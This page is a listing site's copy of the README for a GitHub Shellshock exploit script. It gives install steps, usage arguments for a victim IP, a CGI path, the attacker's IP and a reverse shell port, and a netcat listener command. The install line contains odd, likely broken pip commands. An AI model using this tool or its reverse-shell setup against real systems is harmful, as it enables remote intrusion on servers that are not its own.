An open API service indexing awesome lists of open source software.

https://github.com/8dcc/shellshock-python-exploit

Python script for the shellshock vulnerability.
https://github.com/8dcc/shellshock-python-exploit

Last synced: 3 months ago
JSON representation

Python script for the shellshock vulnerability.

Awesome Lists containing this project

README

          

## Shellshock python exploit

Python script for the shellshock vulnerability.

### Installation

```sudo apt install python-pip && pip install sys && pip install requests && pip install time```

```git clone https://github.com/r4v10l1/shellshock_python_exploit```

```cd shellshock_python_exploit```

```chmod +x shellshock.py```

```./shellshock.py```

### Usage

python shellshock.py `Victim IP` `Vulnerable .cgi path` `Your IP` `Reverse Shell Port`

It is important to leave a space between the victim's ip and the .cgi path.

Example: shellshock.py 192.168.1.X /here/your.cgi 127.0.0.1 4444

Listener command: nc -lvp `port`

### Screenshot

![alt text](https://i.imgur.com/X4sBzwC.png)